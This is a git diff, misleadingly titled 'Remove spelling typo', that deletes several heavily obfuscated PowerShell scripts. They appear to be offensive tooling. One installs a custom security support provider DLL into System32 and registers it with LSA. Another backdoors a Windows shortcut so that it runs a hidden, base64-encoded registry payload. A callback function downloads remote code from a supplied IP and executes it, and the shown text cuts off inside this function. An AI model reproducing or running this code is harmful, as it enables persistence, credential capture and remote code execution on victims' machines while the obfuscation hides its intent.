Remove spelling typo
parent
34ee7ad1ed
commit
5308840474
|
@ -1,114 +0,0 @@
|
|||
SeT 8i53f ( [tYpe]("{0}{1}{2}{3}"-f'Appd','O','mA','In')) ; sET-itEM ('VAR'+'Iab'+'Le:4O'+'TI'+'R') ([tYpE]("{5}{3}{6}{1}{0}{7}{2}{4}"-F'sEmbl','It.as','UildEracC','E','Ess','R','flECTIoN.em','YB')) ; SEt-item VAriabLE:Tn86A ( [typE]("{0}{1}{3}{2}"-F 'fLA','gs','E','atTRiBUT') ) ; Set-itEm ("vARIABlE:w"+"2"+"i") ( [tYPe]("{3}{5}{6}{4}{2}{1}{0}" -f'NgsiZe','ki','PAC','reFL','it.','ECT','ioN.eM') ) ; $TDcp81= [TyPe]("{8}{4}{6}{1}{0}{7}{2}{3}{5}" -F'aLlI','n.C','nvEn','Ti','i','Ons','O','NgCo','ReFlEct'); SeT-ITeM vaRiAbLE:xGL ( [TyPE]("{1}{0}"-f 'nt32','i') ) ; $liW9 = [TyPE]("{11}{3}{2}{5}{1}{8}{6}{4}{9}{7}{10}{0}"-F 'IoN','.','Nti','U','l','Me','TeroPseRvICes.Ca','Ng','IN','li','cONvEnT','r'); sv x8o ( [TypE]("{4}{6}{7}{1}{5}{3}{2}{0}" -F 'ArsEt','Inte','.Ch','Es','RUnt','ropsERVIC','im','e.') ) ; $UmdQ8=[tYPE]("{1}{0}" -f 'tR','iNtp') ; $EHv6mU =[TYPe]("{4}{2}{8}{0}{7}{1}{5}{3}{6}" -F'S','Ces','me.Int','s','ruNTi','.maR','haL','erVi','ErOp') ; function Ge`T-s`ecURi`TyPac`KaG`es
|
||||
{
|
||||
|
||||
|
||||
[CmdletBinding()] Param()
|
||||
|
||||
|
||||
${DYn`ASsEmb`ly} = New-Object ("{0}{1}{5}{3}{4}{2}"-f'S','yste','me','mblyN','a','m.Reflection.Asse')('SSPI')
|
||||
${ASsem`B`Ly`BuilDeR} = ( GI VARIable:8i53f)."v`ALUe"::"CURrENt`Do`M`AIn"."dEF`I`Ne`d`Yna`MiC`AsSemBly"(${dy`NaSs`eMBLy}, $4oTir::"r`Un")
|
||||
${M`OduLebu`IL`D`Er} = ${aSS`EmBlY`BU`iLd`er}."DEf`in`eDyNAMi`CmodU`le"('SSPI', ${fal`SE})
|
||||
|
||||
${fl`A`gs`c`oNSTRuCtOR} = $tN86A."gE`T`ConStR`uC`ToR"(@())
|
||||
${f`LAG`sC`Us`To`Ma`TTRIBute} = New-Object ("{3}{4}{0}{10}{1}{9}{7}{8}{6}{5}{2}"-f'le','ion.Emi','r','Re','f','Builde','te','.C','ustomAttribu','t','ct')(${f`lA`gS`cO`NsTRU`CtoR}, @())
|
||||
${STrucT`A`T`Tr`IBuT`es} = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
|
||||
|
||||
${e`NumB`UILDer} = ${MO`duleBU`IL`DER}."D`ef`inE`eNum"('SSPI.SECPKG_FLAG', 'Public', [Int32])
|
||||
${E`NuMBUi`l`deR}."sETCU`sToM`AtTRibu`TE"(${Fl`AgS`CUStOmat`T`Ri`BUTe})
|
||||
${n`ULL} = ${enumB`Ui`lD`er}."def`ine`LiTeRaL"('INTEGRITY', 1)
|
||||
${N`uLL} = ${enUmb`uILD`Er}."D`ef`In`EL`itERal"('PRIVACY', 2)
|
||||
${N`uLl} = ${enuM`Bu`iL`Der}."dEfIneLITE`R`AL"('TOKEN_ONLY', 4)
|
||||
${N`uLL} = ${E`NuMbuI`ldER}."DEFiNEL`Iter`AL"('DATAGRAM', 8)
|
||||
${n`ULL} = ${en`umbUi`l`dER}."def`IN`ElITErAl"('CONNECTION', 0x10)
|
||||
${nU`lL} = ${EN`umBU`Il`Der}."d`EfinEL`iT`eRAl"('MULTI_REQUIRED', 0x20)
|
||||
${nU`lL} = ${e`NUMbUiLD`ER}."DeF`IN`eliTeRAL"('CLIENT_ONLY', 0x40)
|
||||
${NU`ll} = ${e`NUm`BUi`LdeR}."DEfin`el`i`TerAL"('EXTENDED_ERROR', 0x80)
|
||||
${Nu`ll} = ${EnU`mBUil`D`ER}."dEfi`NELi`TeR`Al"('IMPERSONATION', 0x100)
|
||||
${nu`ll} = ${e`NumbU`iLd`ER}."DefIN`e`liTERal"('ACCEPT_WIN32_NAME', 0x200)
|
||||
${N`Ull} = ${ENu`MbUiLD`ER}."DeFINe`LIT`e`RAL"('STREAM', 0x400)
|
||||
${nU`LL} = ${E`NUmBuil`DER}."d`E`F`InELITERaL"('NEGOTIABLE', 0x800)
|
||||
${N`ULL} = ${EnUM`Bu`i`ldEr}."dE`FINE`LITeRaL"('GSS_COMPATIBLE', 0x1000)
|
||||
${nU`Ll} = ${enuMb`uILD`eR}."DefiNElITE`R`Al"('LOGON', 0x2000)
|
||||
${nU`ll} = ${EnU`Mb`u`ilder}."d`eFiNe`lIt`ErAl"('ASCII_BUFFERS', 0x4000)
|
||||
${NU`Ll} = ${en`UMBuil`DER}."DE`FinE`Lit`erAl"('FRAGMENT', 0x8000)
|
||||
${n`ULL} = ${E`NumB`uI`lder}."dEf`inElit`Eral"('MUTUAL_AUTH', 0x10000)
|
||||
${NU`LL} = ${E`NuMbUIL`D`er}."dEfiNEL`I`TE`RaL"('DELEGATION', 0x20000)
|
||||
${N`ulL} = ${en`uMbuI`LDER}."DefIn`El`iTeRAl"('READONLY_WITH_CHECKSUM', 0x40000)
|
||||
${n`ULL} = ${EN`uM`BuIl`DeR}."deFI`NEl`Ite`RaL"('RESTRICTED_TOKENS', 0x80000)
|
||||
${n`uLL} = ${enU`mbu`ILD`Er}."De`FInel`iteR`AL"('NEGO_EXTENDER', 0x100000)
|
||||
${Nu`ll} = ${EN`Um`BuILD`Er}."D`eFIN`eL`ITeRAl"('NEGOTIABLE2', 0x200000)
|
||||
${n`ULL} = ${eN`um`BUILdeR}."D`EfINe`lItERAl"('APPCONTAINER_PASSTHROUGH', 0x400000)
|
||||
${n`ull} = ${ENuMBU`I`lDeR}."d`EfIn`eLi`Te`RAL"('APPCONTAINER_CHECKS', 0x800000)
|
||||
${se`C`PKg_`FLag} = ${EnuM`B`UILdEr}."cReATET`y`pE"()
|
||||
|
||||
${tYp`eBuiL`Der} = ${M`o`d`UL`ebUILDEr}."DE`Fi`NETYpe"('SSPI.SecPkgInfo', ${sTRUC`Ta`TTrIBuT`es}, [Object], (get-VArIAbLE ('W2'+'i') -vAl )::"siZ`e8")
|
||||
${N`ulL} = ${ty`Pebui`LDEr}."d`eF`IN`eFIelD"('fCapabilities', ${S`EC`PKg_FL`AG}, 'Public')
|
||||
${NU`Ll} = ${t`y`peBu`ILder}."De`FiN`e`FieLD"('wVersion', [Int16], 'Public')
|
||||
${Nu`lL} = ${T`yP`E`BUIldER}."De`FInEFI`Eld"('wRPCID', [Int16], 'Public')
|
||||
${N`UlL} = ${typE`BuIL`dER}."D`eFI`NEFIElD"('cbMaxToken', [Int32], 'Public')
|
||||
${n`Ull} = ${T`ypEBu`il`DER}."DE`FiN`EF`iELD"('Name', [IntPtr], 'Public')
|
||||
${Nu`ll} = ${T`YpE`BUild`ER}."d`e`FInEfieLD"('Comment', [IntPtr], 'Public')
|
||||
${S`e`CpKG`INFo} = ${tyPebUI`l`d`eR}."c`R`eaTETyPE"()
|
||||
|
||||
${tyPe`BUi`ldeR} = ${m`Odulebui`l`der}."D`efIne`TYPe"('SSPI.Secur32', 'Public, Class')
|
||||
${piNvo`kE`me`T`hOD} = ${TYpE`B`uildER}."de`F`iNEp`i`NvokeMethod"('EnumerateSecurityPackages',
|
||||
'secur32.dll',
|
||||
'Public, Static',
|
||||
( geT-iTeM ('vARiaBL'+'E:tD'+'cP8'+'1') )."v`AlUe"::"s`T`Andard",
|
||||
[Int32],
|
||||
[Type[]] @( ( get-VARiaBlE XgL )."V`AlUE"."maKE`BYrEfT`YPE"(),
|
||||
( VARiabLE ("U"+"mDQ8") )."va`LuE"."MAKe`BYR`E`FTypE"()),
|
||||
(Item ('v'+'A'+'RiaBL'+'E:lIW9'))."vAl`UE"::"wI`NAPI",
|
||||
(VaRIaBLE X8o -VaL )::"A`NsI")
|
||||
|
||||
${s`e`CUR32} = ${typ`Ebu`iLdEr}."crEA`T`e`TYpe"()
|
||||
|
||||
${PAC`kAGEc`ount} = 0
|
||||
${PAcK`AgeARraY`P`Tr} = ( GET-varIablE ("UMdQ"+"8") )."v`Alue"::"zE`Ro"
|
||||
${r`e`sUlT} = ${sEC`uR`32}::"EnU`m`E`RATeS`e`cU`RitY`pACKAGEs"([Ref] ${p`AckagE`couNt}, [Ref] ${p`ACkAGE`AR`RAypTr})
|
||||
|
||||
if (${R`E`Sult} -ne 0)
|
||||
{
|
||||
throw "Unable to enumerate seucrity packages. Error (0x$($Result.ToString('X8')))"
|
||||
}
|
||||
|
||||
if (${pA`CkA`ge`cOUnt} -eq 0)
|
||||
{
|
||||
Write-Verbose 'There are no installed security packages.'
|
||||
return
|
||||
}
|
||||
|
||||
${s`T`RucTaDdRe`SS} = ${paCK`A`GeaRr`AyPtr}
|
||||
|
||||
foreach (${I} in 1..${PaC`kAgec`O`u`Nt})
|
||||
{
|
||||
${SeCpaC`kagES`T`R`u`Ct} = ( gi ('VARIa'+'bLe:EhV6'+'M'+'u'))."V`AluE"::"PTrt`osTr`uctu`Re"(${s`TRU`cT`ADd`REsS}, [Type] ${SECP`KG`infO})
|
||||
${STR`ucT`ADDRE`Ss} = [IntPtr] (${sTRUc`TaddrE`Ss}."TO`INt64"() + $ehV6Mu::"SiZE`OF"([Type] ${se`C`Pkg`INFo}))
|
||||
|
||||
${na`ME} = ${NU`LL}
|
||||
|
||||
if (${seCP`Ac`KaGeS`TrU`ct}."n`AME" -ne (dIR ('varI'+'A'+'ble'+':'+'uMdq8'))."VAl`uE"::"ze`Ro")
|
||||
{
|
||||
${n`Ame} = (geT-cHiLdiTEM ("vaRIabl"+"e:e"+"H"+"V6mu"))."V`AluE"::"p`TRt`ostRiNg`A`NSI"(${s`eCpack`AGeSTR`UCt}."na`Me")
|
||||
}
|
||||
|
||||
${C`Omm`eNt} = ${N`UlL}
|
||||
|
||||
if (${S`Ec`P`ACkA`GeStru`ct}."COmm`ent" -ne ( gi ("vaRI"+"ab"+"Le"+":UMd"+"Q8") )."VAL`UE"::"Z`ERO")
|
||||
{
|
||||
${C`oMMeNt} = (varIAbLE Ehv6mu )."va`LUE"::"PTR`T`oSTr`InGan`SI"(${SE`C`pacK`AGE`St`RUcT}."cOMmE`NT")
|
||||
}
|
||||
|
||||
${AT`TrIbUt`Es} = @{
|
||||
"nA`me" = ${Na`ME}
|
||||
"Co`MmeNT" = ${c`omme`Nt}
|
||||
"Cap`Abil`iTI`es" = ${s`E`CP`AcKAG`ES`TrucT}."FCaP`Ab`Il`IT`iES"
|
||||
"MA`Xto`KenSiZe" = ${seCp`Ac`K`A`GestRUCT}."C`BM`AxToKen"
|
||||
}
|
||||
|
||||
${SE`cP`AcKA`GE} = New-Object ("{2}{1}{0}"-f 't','c','PSObje') -Property ${A`TT`R`iBUteS}
|
||||
${sECpacK`A`Ge}."PS`o`Bject"."Typ`e`NamEs"[0] = 'SECUR32.SECPKGINFO'
|
||||
|
||||
${Sec`pACka`ge}
|
||||
}
|
||||
}
|
|
@ -1,171 +0,0 @@
|
|||
${Y`cDt} = [tYpe]("{4}{3}{6}{7}{5}{1}{0}{2}" -f'en','pal.windowSId','Tity','ecuR','S','CI','I','TY.pRin') ; Set-vaRIAbLE ("{1}{0}" -f'rj','f') ( [tYpe]("{0}{2}{6}{1}{7}{4}{3}{8}{5}"-f 'S','Y.PrInCI','eCuRi','bUIL','Ows','LE','T','pal.WINd','tINro') ) ; ${X`kW} = [tYPe]("{2}{1}{3}{0}" -F'IlemOdE','StEM','Sy','.io.f') ; sV ('x1'+'uO') ( [TYPE]("{0}{4}{2}{6}{1}{3}{5}" -F'SyStEM','c','.fiLe','C','.iO','Ess','A')) ; Set-IteM ("varIaBLe:u"+"W"+"b") ( [TYpe]("{1}{0}{4}{3}{2}"-f'.','sySTEm','Ng','OdI','TeXt.asCiienc') ) ;${60Oc} = [TYpE]("{6}{2}{1}{3}{4}{0}{5}"-f'koRig','M.io.S','te','e','E','iN','SYs'); sV ('yAp'+'vd') ( [TyPE]("{2}{1}{0}"-F'MaIN','dO','App') ) ; ${8d`B6O5}=[TYpE]("{1}{3}{6}{2}{0}{4}{5}" -f 'emBlybu','Ref','.ASS','LE','IlD','ERACCESS','CTIon.emit'); Set-ITEm ("vAr"+"Iable:"+"T"+"8Cg") ([TyPe]("{3}{5}{7}{0}{6}{4}{8}{2}{1}"-f 'o','onS','TI','Ref','al','lECT','n.c','I','lINgcoNVEn') ) ; SET-vAriAbLe ("{0}{1}" -f '0','zs') ( [type]("{2}{7}{0}{6}{5}{1}{3}{4}"-f'Me.','eRvIce','rUn','S.CaLlI','NgcONVEnTIoN','Terops','IN','TI') ); SEt ("{0}{1}" -f 'N','5m') ( [tYPE]("{0}{5}{4}{6}{8}{2}{7}{3}{1}"-F'ru','harSEt','PserV','.C','tIM','N','E.','IcES','iNTERo') ) ;${c`7fb`dZ} = [TyPE]("{0}{2}{1}"-F 'I','TPtr','n');${6`O0hvP}= [TYPE]("{3}{0}{2}{5}{1}{7}{4}{6}" -f'u','in','NtIme','R','icES.MaRshA','.','l','teropSerV') ;function INStAl`l-`S`sP
|
||||
{
|
||||
|
||||
|
||||
[CmdletBinding()] Param (
|
||||
[ValidateScript({Test-Path (Resolve-Path ${_})})]
|
||||
[String]
|
||||
${p`Ath}
|
||||
)
|
||||
|
||||
${PrI`N`ciPaL} = [Security.Principal.WindowsPrincipal] ${yc`dt}::"G`EtCuRRe`Nt"()
|
||||
|
||||
if(-not ${P`RI`NC`IPal}."I`SinRolE"( (GI ("{3}{0}{2}{1}" -f 'ARi','Le:frj','ab','V')).VAlUe::"Adm`I`NisTR`At`OR"))
|
||||
{
|
||||
throw 'Installing an SSP dll requires administrative rights. Execute this script from an elevated PowerShell prompt.'
|
||||
}
|
||||
|
||||
|
||||
${FUlLDLl`p`A`Th} = Resolve-Path ${Pa`TH}
|
||||
|
||||
|
||||
function LOCAl:g`Et-peaRcHItE`C`TU`Re
|
||||
{
|
||||
Param
|
||||
(
|
||||
[Parameter( pOsITion = 0,
|
||||
MandATory = ${TR`Ue} )]
|
||||
[String]
|
||||
${pA`Th}
|
||||
)
|
||||
|
||||
|
||||
${Fil`e`S`TreaM} = New-Object ("{3}{0}{1}{2}{4}" -f 's','tem.I','O.FileS','Sy','tream')(${Pa`Th}, ${X`KW}::"Op`eN", (gi ('Va'+'r'+'iaB'+'lE'+':x1uO')).vALUe::"rE`Ad")
|
||||
|
||||
[Byte[]] ${m`zHe`A`der} = New-Object ("{0}{1}" -f 'Byte','[]')(2)
|
||||
${F`IL`eS`TrEAM}."RE`AD"(${m`Zhe`ADER},0,2) | Out-Null
|
||||
|
||||
${h`EA`dER} = ( childITEM ("VarIabLE:u"+"w"+"B") ).VaLue::"aS`CII"."gEt`StRi`Ng"(${M`ZHEad`ER})
|
||||
if (${hE`AdEr} -ne 'MZ')
|
||||
{
|
||||
${F`IlE`sTRe`AM}."cLo`se"()
|
||||
Throw 'Invalid PE header.'
|
||||
}
|
||||
|
||||
|
||||
${Fi`lEST`REAM}."S`eeK"(0x3c, ( geT-ChilDItem ("{1}{0}{3}{4}{2}" -f 'Le','VARIAB','C',':','60O')).Value::"BE`GIn") | Out-Null
|
||||
|
||||
[Byte[]] ${L`FaN`EW} = New-Object ("{1}{0}"-f ']','Byte[')(4)
|
||||
|
||||
|
||||
${F`IlEs`TreAm}."RE`AD"(${Lf`AnEw},0,4) | Out-Null
|
||||
${PEoF`FS`et} = [Int] ('0x{0}' -f (( ${l`F`AnEW}[-1..-4] | % { ${_}."tOst`R`ING"('X2') } ) -join ''))
|
||||
|
||||
|
||||
${FIl`eStrE`AM}."se`ek"(${pE`o`FFSEt} + 4, ( Ls ("v"+"aRIAb"+"L"+"e:60OC") ).ValUe::"b`eGin") | Out-Null
|
||||
[Byte[]] ${i`mAGE_`File_`m`ACh`iNe} = New-Object ("{2}{0}{1}" -f'e[',']','Byt')(2)
|
||||
|
||||
|
||||
${FI`Les`TRE`Am}."rE`AD"(${ImAGe_`File`_`M`Ach`Ine},0,2) | Out-Null
|
||||
${aRch`ITeC`T`URE} = '{0}' -f (( ${ImaGe_`FiL`E`_mACHiNe}[-1..-2] | % { ${_}."Tost`RInG"('X2') } ) -join '')
|
||||
${FI`LESt`Ream}."Cl`ose"()
|
||||
|
||||
if ((${A`RcHi`TeCtu`RE} -ne '014C') -and (${aRC`hiteCT`uRe} -ne '8664'))
|
||||
{
|
||||
Throw 'Invalid PE header or unsupported architecture.'
|
||||
}
|
||||
|
||||
if (${ARcHi`TECTu`Re} -eq '014C')
|
||||
{
|
||||
Write-Output '32-bit'
|
||||
}
|
||||
elseif (${archIT`ec`TUre} -eq '8664')
|
||||
{
|
||||
Write-Output '64-bit'
|
||||
}
|
||||
else
|
||||
{
|
||||
Write-Output 'Other'
|
||||
}
|
||||
}
|
||||
|
||||
${DL`larchiT`Ec`TUre} = Get-PEArchitecture ${fu`L`ld`LlPath}
|
||||
|
||||
${OS`ARcH} = Get-WmiObject ("{1}{6}{3}{2}{0}{5}{4}" -f 'erating','Wi','Op','2_','tem','Sys','n3') | Select-Object -ExpandProperty ("{0}{2}{1}"-f'O','ture','SArchitec')
|
||||
|
||||
if (${d`ll`ArcH`itE`CTURE} -ne ${O`SArcH})
|
||||
{
|
||||
throw 'The operating system architecture must match the architecture of the SSP dll.'
|
||||
}
|
||||
|
||||
${D`Ll} = Get-Item ${FULl`D`LlP`ATH} | Select-Object -ExpandProperty ("{1}{0}" -f 'e','Nam')
|
||||
|
||||
|
||||
|
||||
${dLl`N`Ame} = ${D`ll} | % { % {(${_} -split '\.')[0]} }
|
||||
|
||||
|
||||
${sec`urI`Typa`ck`AgES} = Get-ItemProperty (("{8}{2}{10}{6}{5}{4}{12}{11}{1}{7}{0}{3}{9}" -f 'olSet','n','M:rAUSYST','rAUCon','r','UCu','MrA','tr','HKL','trolrAULsa','E','ntCo','re')).REPLacE('rAU','\') -Name 'Security Packages' |
|
||||
Select-Object -ExpandProperty 'Security Packages'
|
||||
|
||||
if (${SeCUR`ITy`p`AcK`A`gEs} -contains ${dLlN`A`me})
|
||||
{
|
||||
throw "'$DllName' is already present in HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages."
|
||||
}
|
||||
|
||||
|
||||
${N`ATive`I`NStA`L`lDir} = "$($Env:windir)\Sysnative"
|
||||
|
||||
if (Test-Path ${NatIVe`iNsta`l`LdIR})
|
||||
{
|
||||
${iNst`AL`lD`Ir} = ${nativ`eI`Ns`TalLDIR}
|
||||
}
|
||||
else
|
||||
{
|
||||
${iNSta`l`l`dIR} = "$($Env:windir)\System32"
|
||||
}
|
||||
|
||||
if (Test-Path (Join-Path ${iNstA`L`LD`IR} ${d`ll}))
|
||||
{
|
||||
throw "$Dll is already installed in $InstallDir."
|
||||
}
|
||||
|
||||
|
||||
Copy-Item ${ful`L`dlLp`AtH} ${INStAll`D`Ir}
|
||||
|
||||
${S`ecuRit`ypAcKA`gES} += ${dl`L`Name}
|
||||
|
||||
Set-ItemProperty ((("{1}{8}{0}{4}{2}{9}{5}{6}{7}{10}{3}" -f 'Y','HKLM:','QD1CurrentContro','1Lsa','STEM','etQ','D1Contro','lQ','QD1S','lS','D')) -cRePLace 'QD1',[cHAR]92) -Name 'Security Packages' -Value ${SEC`U`RityP`ACkages}
|
||||
|
||||
${DYnaS`S`eMblY} = New-Object ("{0}{1}{7}{4}{2}{5}{6}{3}" -f 'S','yste','e','Name','R','flecti','on.Assembly','m.')('SSPI2')
|
||||
${assE`M`BLyBUil`Der} = ${yAP`Vd}::"CU`Rre`NtDoma`IN"."de`FI`NED`y`NAmIcaS`semb`LY"(${dyna`S`Sem`BLY}, ( DiR ("{0}{1}{3}{2}{4}" -f'vaR','iAb','8d','le:','B6o5') ).vALUe::"r`uN")
|
||||
${M`odULebUi`lder} = ${Assem`B`LYbu`I`LDEr}."deF`inEDyna`mI`cmOD`u`LE"('SSPI2', ${faL`sE})
|
||||
|
||||
${Ty`PebuILD`er} = ${MODUL`eBU`Il`DER}."De`F`inE`TYpe"('SSPI2.Secur32', 'Public, Class')
|
||||
${PIn`V`OKE`m`eTHOD} = ${TY`pEbuiL`deR}."De`FinePINvo`kEm`E`THoD"('AddSecurityPackage',
|
||||
'secur32.dll',
|
||||
'Public, Static',
|
||||
${T8`Cg}::"stA`ND`ARD",
|
||||
[Int32],
|
||||
[Type[]] @([String], [IntPtr]),
|
||||
( gET-VarIABle ("{1}{0}" -f 'ZS','0') -ValUeonl )::"WInA`PI",
|
||||
${n`5M}::"AU`TO")
|
||||
|
||||
${S`Ecu`R32} = ${TYp`e`BUI`lDEr}."C`REaTET`YpE"()
|
||||
|
||||
if ( ( vaRiAble ('c'+'7FbDZ') ).VAlUe::"S`Ize" -eq 4) {
|
||||
${S`Tructs`i`ZE} = 20
|
||||
} else {
|
||||
${S`TrucTs`ize} = 24
|
||||
}
|
||||
|
||||
${S`T`RUctpTr} = ( gI ("{1}{4}{3}{0}{2}"-f '0','v','hVp','BlE:6O','ARIa') ).VALUE::"AL`lo`cHgLObal"(${str`Uct`SIzE})
|
||||
( chILDITeM ("{2}{1}{0}{3}"-f'O0H','riaBLE:6','VA','VP') ).Value::"wrIT`e`iNt32"(${st`R`u`CTptr}, ${sTru`C`TSI`Ze})
|
||||
|
||||
${runTI`M`eSUC`Ce`SS} = ${t`Rue}
|
||||
|
||||
try {
|
||||
${rE`SU`lt} = ${s`Ec`ur32}::"AddS`E`c`U`RitypAck`Age"(${dLl`N`AME}, ${STRuC`T`pTR})
|
||||
} catch {
|
||||
${hR`e`sult} = ${er`ROR}[0]."Excep`Ti`ON"."I`NnE`R`eXCePT`ioN"."HrESU`LT"
|
||||
Write-Warning "Runtime loading of the SSP failed. (0x$($HResult.ToString('X8')))"
|
||||
Write-Warning "Reason: $(([ComponentModel.Win32Exception] $HResult).Message)"
|
||||
${RUN`TiMES`Uc`cE`SS} = ${f`AlsE}
|
||||
}
|
||||
|
||||
if (${Ru`NT`iMESU`cCEsS}) {
|
||||
Write-Verbose 'Installation and loading complete!'
|
||||
} else {
|
||||
Write-Verbose 'Installation complete! Reboot for changes to take effect.'
|
||||
}
|
||||
}
|
|
@ -1,76 +0,0 @@
|
|||
${0`4Dp}= [tYpe]("{0}{2}{4}{3}{1}" -F'sys','ding','teM.TE','ENCo','xt.') ; ${x`8Yn9} = [typE]("{0}{4}{3}{2}{1}"-F 'Sy','t','NVer','Tem.Co','S'); function iN`VOKe-BaCkdoO`Rl`NK {
|
||||
|
||||
|
||||
[CmdletBinding()] Param(
|
||||
[Parameter(vaLueFrOMPIPeLINe=${T`Rue}, MAnDAtory = ${t`RuE})]
|
||||
[ValidateScript({Test-Path -Path ${_} })]
|
||||
[String]
|
||||
${l`NkpATh},
|
||||
|
||||
[String]
|
||||
${ENcs`cr`IpT},
|
||||
|
||||
[String]
|
||||
${rEG`pA`TH} = 'HKCU:\Software\Microsoft\Windows\debug',
|
||||
|
||||
[Switch]
|
||||
${C`LEANUp}
|
||||
)
|
||||
|
||||
${ReG`pa`Rts} = ${REG`pA`TH}."sp`LIT"("\")
|
||||
${PA`Th} = ${r`e`GpaRtS}[0..(${r`EGp`Ar`TS}."c`OUnt"-2)] -join "\"
|
||||
${N`AmE} = ${RE`Gp`ArTS}[-1]
|
||||
|
||||
|
||||
${o`Bj} = New-Object -ComObject ("{0}{2}{1}"-f'WScri','ll','pt.She')
|
||||
${l`Nk} = ${o`Bj}."crE`At`esHo`Rtcut"(${LNK`pa`Th})
|
||||
|
||||
|
||||
${Targ`e`T`patH} = ${L`NK}."tA`RgE`TpA`Th"
|
||||
${W`Ork`iN`g`DIRECTory} = ${l`NK}."WOrkING`DIr`Ec`T`oRy"
|
||||
${icOn`LOCat`Ion} = ${L`NK}."Ic`oN`LO`cATION"
|
||||
|
||||
if(${CL`eAnUp}) {
|
||||
|
||||
|
||||
${ORIg`I`NAl`p`ATh} = (${ic`onl`o`caTiOn} -split ",")[0]
|
||||
|
||||
${l`NK}."tArg`eTPA`Th" = ${ORiGI`NALP`ATh}
|
||||
${L`Nk}."ArgU`m`ents" = ${Nu`LL}
|
||||
${l`NK}."w`ind`o`wstylE" = 1
|
||||
${L`Nk}."s`AvE"()
|
||||
|
||||
|
||||
${N`uLL} = Remove-ItemProperty -Force -Path ${Pa`Th} -Name ${N`AmE}
|
||||
}
|
||||
else {
|
||||
|
||||
if(!${enC`scr`ipt} -or ${e`N`cSC`RIpT} -eq '') {
|
||||
throw "-EncScript or -Cleanup required!"
|
||||
}
|
||||
|
||||
|
||||
${Nu`Ll} = Set-ItemProperty -Force -Path ${p`ATH} -Name ${N`AMe} -Value ${en`CSCRI`PT}
|
||||
|
||||
"[*] B64 script stored at '$RegPath'`n"
|
||||
|
||||
|
||||
${L`Nk}."Ta`RGEtpa`TH" = "$env:SystemRoot\System32\WindowsPowerShell\v1.0\powershell.exe"
|
||||
|
||||
|
||||
${L`A`uNch`StR`iNG} = '[System.Diagnostics.Process]::Start("'+${T`ArGetp`AtH}+'");IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp '+${P`AtH}+' '+${nA`Me}+').'+${na`ME}+')))'
|
||||
|
||||
${LAU`N`c`HBYteS} = ( cHiLdITem ("{4}{3}{2}{0}{1}"-f'4','dP',':0','iaBLE','VaR') )."v`Alue"::"UN`icode"."gETB`Y`TEs"(${LAun`cH`STRI`Ng})
|
||||
${laUnC`H`B64} = ( dIr ("v"+"ar"+"iABLE:x8y"+"N9") )."v`ALuE"::"T`OBAse`64STri`Ng"(${LaU`Nchby`T`es})
|
||||
|
||||
${L`Nk}."a`Rg`UMEnts" = "-w hidden -nop -enc $LaunchB64"
|
||||
|
||||
|
||||
${L`Nk}."WorK`INGdIR`e`C`ToRY" = ${W`oR`KInGdIrEc`TORy}
|
||||
${l`Nk}."I`c`OnLocA`TION" = "$TargetPath,0"
|
||||
${l`Nk}."wIN`dow`STy`le" = 7
|
||||
${L`NK}."SA`VE"()
|
||||
|
||||
"[*] .LNK at $LNKPath set to trigger`n"
|
||||
}
|
||||
}
|
|
@ -1,583 +0,0 @@
|
|||
$5kzyIT = [TYpE]("{4}{0}{1}{2}{3}" -F'e','t.SErV','I','CEPoinTmanAGeR','sySTem.n') ; $nzV2aP =[tyPe]("{1}{3}{2}{4}{0}"-F 'Rt','SYs','n','tEm.Co','vE') ; seT ('T'+'1o5') ( [Type]("{0}{3}{1}{2}" -f'sysTEM.T','nC','oding','exT.e') ) ;SeT-ITEM ("{3}{2}{0}{1}{4}" -f':Tr','i','bLe','varIa','XE') ( [tYPe]("{0}{3}{2}{1}"-F'sysTEm','s','.Dn','.neT') ) ; seT ("ZN"+"u") ( [type]("{2}{1}{3}{4}{5}{0}{6}" -F 't','ecURitY.PRiNC','s','ipAL.wInDoWs','ID','en','itY')) ; SET-itEm ("VArIABle"+":q8WgP"+"c") ( [TypE]("{0}{1}"-f'rE','gEX')) ; Sv ("{1}{0}" -f 'iUY','l8f') ([typE]("{3}{2}{4}{1}{0}" -f 'EtS.aDDReSsFaMIlY','K','t','NE','.SOc'));sEt-iteM ("{0}{3}{2}{1}"-f 'vaRiAb','pVj','4','lE:26') ( [typE]("{0}{5}{2}{4}{3}{1}"-F'nET.S','kettYpE','cKeTS.','Oc','s','o') ) ; SEt-IteM ("{2}{0}{3}{1}"-f 'blE','ACs','VArIa',':E') ([TYPE]("{2}{4}{3}{6}{1}{5}{0}{7}" -F'lT','o','neT.sO','KeT','c','TOcO','S.Pr','yPE') ); set-iTEM ("{3}{2}{0}{1}" -f 'bLE:','jMHB','aRiA','v') ([TYpE]("{1}{6}{2}{3}{5}{4}{0}" -F'e','NET','SOCkeTS','.IOCOnt','D','rOLCO','.')) ; sET-ITem ("vA"+"rIabLE:y"+"4"+"h"+"br") ( [tYpe]("{0}{1}{3}{4}{2}"-f 'NeT.SO','CKeTs.socKETFL','S','A','G')); Sv ("I6S"+"5nr") ( [tYpE]("{0}{1}{2}"-f'daT','ET','Ime'));
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
function iNv`okE-Ca`LlbAck`IEx
|
||||
{
|
||||
|
||||
Param(
|
||||
[Parameter(mANDatOry=${Tr`uE},poSitION=1)]
|
||||
[string]${cAl`l`BAcKip},
|
||||
[Parameter(mandatoRy=${Fa`LSE},poSitIoN=2)]
|
||||
[int]${me`T`hOD}=0,
|
||||
[Parameter(MAndaToRy=${F`AlSE},posITION=3)]
|
||||
[string]${bI`TSt`eMPFi`Le}="$env:temp\ps_conf.cfg",
|
||||
[Parameter(mANDAtOrY=${F`ALse},POsiTIoN=4)]
|
||||
[string]${R`E`SouRCe}="/favicon.ico",
|
||||
[Parameter(MaNDaTory=${FA`lsE},POsITIon=5)]
|
||||
[bool]${sI`lENT}=${f`A`lSE}
|
||||
)
|
||||
|
||||
|
||||
if(${c`All`Ba`ckIP})
|
||||
{
|
||||
try {
|
||||
|
||||
if (${Met`H`OD} -eq 0)
|
||||
{
|
||||
|
||||
${u`RL}="http://$CallbackIP$resource"
|
||||
if(-not ${SiL`enT}) {write-host "Calling home with method $method to: $url"}
|
||||
|
||||
${e`NC} = (new-object ("{2}{0}{1}"-f 't','.webclient','ne'))."dOwn`loA`D`String"(${U`Rl})
|
||||
}
|
||||
|
||||
elseif (${meT`h`od} -eq 1)
|
||||
{
|
||||
